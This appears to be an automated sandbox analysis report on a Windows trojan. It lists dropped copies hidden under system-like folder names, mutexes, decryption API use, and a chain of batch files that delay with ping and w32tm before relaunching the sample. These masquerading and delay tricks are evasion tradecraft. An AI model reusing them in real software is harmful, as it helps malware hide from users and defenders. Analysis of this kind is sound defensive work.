Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BAC0D70	18_2_00007FFD9BAC0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BB0A4C7	18_2_00007FFD9BB0A4C7
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BB1A399	18_2_00007FFD9BB1A399
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BB2CB41	18_2_00007FFD9BB2CB41
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BB24BEB	18_2_00007FFD9BB24BEB
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BADBD2D	18_2_00007FFD9BADBD2D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BAB0D70	23_2_00007FFD9BAB0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BACD7B6	23_2_00007FFD9BACD7B6
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB1CB41	23_2_00007FFD9BB1CB41
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB14BEB	23_2_00007FFD9BB14BEB
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BABF7CA	23_2_00007FFD9BABF7CA
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BAFA4C7	23_2_00007FFD9BAFA4C7
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB0A389	23_2_00007FFD9BB0A389
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BACBD2D	23_2_00007FFD9BACBD2D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 28_2_00007FFD9BAA0D70	28_2_00007FFD9BAA0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 33_2_00007FFD9BAD0D70	33_2_00007FFD9BAD0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BAEA4C7	38_2_00007FFD9BAEA4C7
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BAFA389	38_2_00007FFD9BAFA389
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BAAF7CA	38_2_00007FFD9BAAF7CA
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BB0CB41	38_2_00007FFD9BB0CB41
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BB04BEB	38_2_00007FFD9BB04BEB
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BAA0D70	38_2_00007FFD9BAA0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BABD7B6	38_2_00007FFD9BABD7B6
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BABBD2D	38_2_00007FFD9BABBD2D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 43_2_00007FFD9BACD7B6	43_2_00007FFD9BACD7B6
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 43_2_00007FFD9BB1CB41	43_2_00007FFD9BB1CB41
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 43_2_00007FFD9BB14BEB	43_2_00007FFD9BB14BEB
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 43_2_00007FFD9BAB0D70	43_2_00007FFD9BAB0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 43_2_00007FFD9BAFA4C7	43_2_00007FFD9BAFA4C7
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 43_2_00007FFD9BB0A389	43_2_00007FFD9BB0A389
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 43_2_00007FFD9BABF7CA	43_2_00007FFD9BABF7CA
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 43_2_00007FFD9BACBD2D	43_2_00007FFD9BACBD2D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 48_2_00007FFD9BABD7B6	48_2_00007FFD9BABD7B6
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 48_2_00007FFD9BB0CB41	48_2_00007FFD9BB0CB41
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 48_2_00007FFD9BB04BEB	48_2_00007FFD9BB04BEB
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 48_2_00007FFD9BAEA4C7	48_2_00007FFD9BAEA4C7
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 48_2_00007FFD9BAFA389	48_2_00007FFD9BAFA389
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 48_2_00007FFD9BAAF7CA	48_2_00007FFD9BAAF7CA
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 48_2_00007FFD9BAA0D70	48_2_00007FFD9BAA0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 48_2_00007FFD9BABBD2D	48_2_00007FFD9BABBD2D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 54_2_00007FFD9BB1A4C7	54_2_00007FFD9BB1A4C7
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 54_2_00007FFD9BB2A39C	54_2_00007FFD9BB2A39C
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 54_2_00007FFD9BADF7CA	54_2_00007FFD9BADF7CA
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 54_2_00007FFD9BAD0D70	54_2_00007FFD9BAD0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 54_2_00007FFD9BAED7B6	54_2_00007FFD9BAED7B6
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 54_2_00007FFD9BB3CB41	54_2_00007FFD9BB3CB41
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 54_2_00007FFD9BB34BEB	54_2_00007FFD9BB34BEB
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 54_2_00007FFD9BAEBD2D	54_2_00007FFD9BAEBD2D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 59_2_00007FFD9BB1CB41	59_2_00007FFD9BB1CB41
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 59_2_00007FFD9BB14BEB	59_2_00007FFD9BB14BEB
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 59_2_00007FFD9BAB0D70	59_2_00007FFD9BAB0D70
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 59_2_00007FFD9BAFA4C7	59_2_00007FFD9BAFA4C7
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 59_2_00007FFD9BB0A389	59_2_00007FFD9BB0A389
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 59_2_00007FFD9BABF7CA	59_2_00007FFD9BABF7CA
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 59_2_00007FFD9BACD7B6	59_2_00007FFD9BACD7B6
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 59_2_00007FFD9BACBD2D	59_2_00007FFD9BACBD2D

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe 51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
Source: Joe Sandbox View	Dropped File: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe 51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
Source: Joe Sandbox View	Dropped File: C:\Program Files\Windows NT\TableTextService\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe 51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34

Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Code function: String function: 00007FFD9BB094F3 appears 40 times

Source: OH6KO8NBy1.exe, 00000000.00000002.1681991038.000000001B3F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs OH6KO8NBy1.exe
Source: OH6KO8NBy1.exe, 00000000.00000002.1681991038.000000001B3F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs OH6KO8NBy1.exe
Source: OH6KO8NBy1.exe, 00000000.00000000.1653332376.0000000000682000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs OH6KO8NBy1.exe
Source: OH6KO8NBy1.exe	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs OH6KO8NBy1.exe

Source: OH6KO8NBy1.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: OH6KO8NBy1.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Memory Compression.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe1.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: OH6KO8NBy1.exe, Qr2vJkulGbfJGi4ursy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: OH6KO8NBy1.exe, Qr2vJkulGbfJGi4ursy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: OH6KO8NBy1.exe, Qr2vJkulGbfJGi4ursy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: OH6KO8NBy1.exe, Qr2vJkulGbfJGi4ursy.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@115/55@0/1

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

File created: C:\Program Files\Windows NT\TableTextService\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Jump to behavior

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OH6KO8NBy1.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

File created: C:\Users\user\AppData\Local\Temp\gB4rnXAIWV

Jump to behavior

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9nb3HPdPUQ.bat"

Source: OH6KO8NBy1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: OH6KO8NBy1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: OH6KO8NBy1.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

File read: C:\Users\user\Desktop\OH6KO8NBy1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\OH6KO8NBy1.exe "C:\Users\user\Desktop\OH6KO8NBy1.exe"
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9nb3HPdPUQ.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Osft0y9e1S.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gzlPEas6c9.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RKW7EBQnZE.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KMG2LIZgv2.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eMBuAd62pF.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9ZQNubuJrx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NVJoNfH6eh.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x0UH1pL55G.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ip3Bhi35Fh.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4U0fcSq6WH.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9nb3HPdPUQ.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Osft0y9e1S.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
